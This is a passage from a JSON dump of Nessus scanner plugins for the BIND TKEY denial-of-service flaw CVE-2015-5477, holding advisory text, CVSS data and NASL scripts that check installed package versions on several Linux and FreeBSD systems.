(rpm_check(release:\"ALA\", reference:\"bind-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-chroot-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-debuginfo-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-devel-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-libs-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-sdb-9.8.2-0.30.rc1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bind-utils-9.8.2-0.30.rc1.38.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:35", "description": "Updated bind97 packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "CentOS 5 : bind97 (CESA-2015:1515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bind97", "p-cpe:/a:centos:centos:bind97-chroot", "p-cpe:/a:centos:centos:bind97-devel", "p-cpe:/a:centos:centos:bind97-libs", "p-cpe:/a:centos:centos:bind97-utils", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85049", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1515 and \n# CentOS Errata and Security Advisory 2015:1515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85049);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"CentOS 5 : bind97 (CESA-2015:1515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-July/021269.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?77375277\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind97 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-devel / bind97-libs / bind97-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:35", "description": "Jonathan Foote discovered that the BIND DNS server does not properly handle TKEY queries. A remote attacker can take advantage of this flaw to mount a denial of service via a specially crafted query triggering an assertion failure and causing BIND to exit.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Debian DLA-285-1 : bind9 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bind9", "p-cpe:/a:debian:debian_linux:bind9-doc", "p-cpe:/a:debian:debian_linux:bind9-host", "p-cpe:/a:debian:debian_linux:bind9utils", "p-cpe:/a:debian:debian_linux:dnsutils", "p-cpe:/a:debian:debian_linux:host", "p-cpe:/a:debian:debian_linux:libbind-dev", "p-cpe:/a:debian:debian_linux:libbind9-60", "p-cpe:/a:debian:debian_linux:libdns69", "p-cpe:/a:debian:debian_linux:libisc62", "p-cpe:/a:debian:debian_linux:libisccc60", "p-cpe:/a:debian:debian_linux:libisccfg62", "p-cpe:/a:debian:debian_linux:liblwres60", "p-cpe:/a:debian:debian_linux:lwresd", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-285.NASL", "href": "https://www.tenable.com/plugins/nessus/85052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-285-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85052);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Debian DLA-285-1 : bind9 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering\nan assertion failure and causing BIND to exit.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/07/msg00023.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/bind9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:dnsutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbind-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbind9-60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libdns69\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisc62\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisccc60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisccfg62\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:liblwres60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lwresd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"bind9\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9-doc\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9-host\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9utils\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"dnsutils\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"host\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbind-dev\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbind9-60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libdns69\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisc62\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisccc60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisccfg62\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"liblwres60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lwresd\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:40", "description": "ISC reports :\n\nAn error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "FreeBSD : bind -- denial of service vulnerability (731cdeaa-3564-11e5-9970-14dae9d210b8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bind910", "p-cpe:/a:freebsd:freebsd:bind910-base", "p-cpe:/a:freebsd:freebsd:bind99", "p-cpe:/a:freebsd:freebsd:bind99-base", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_731CDEAA356411E5997014DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/85066", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85066);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FreeBSD\", value:\"SA-15:17.bind\");\n\n script_name(english:\"FreeBSD : bind -- denial of service vulnerability (731cdeaa-3564-11e5-9970-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC reports :\n\nAn error in the handling of TKEY queries can be exploited by an\nattacker for use as a denial-of-service vector, as a constructed\npacket can use the defect to trigger a REQUIRE assertion failure,\ncausing BIND to exit.\"\n );\n # https://kb.isc.org/article/AA-01272/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n # https://vuxml.freebsd.org/freebsd/731cdeaa-3564-11e5-9970-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?62ad7b09\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind910\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind910-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind99-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bind910<9.10.2P3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind99<9.9.7P2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind910-base>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind99-base>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:43", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bind97 on SL5.x i386/x86_64 (20150729)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind97", "p-cpe:/a:fermilab:scientific_linux:bind97-chroot", "p-cpe:/a:fermilab:scientific_linux:bind97-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind97-devel", "p-cpe:/a:fermilab:scientific_linux:bind97-libs", "p-cpe:/a:fermilab:scientific_linux:bind97-utils", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150729_BIND97_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/85119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85119);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Scientific Linux Security Update : bind97 on SL5.x i386/x86_64 (20150729)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1507&L=scientific-linux-errata&F=&S=&P=12946\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d505311\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-debuginfo-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 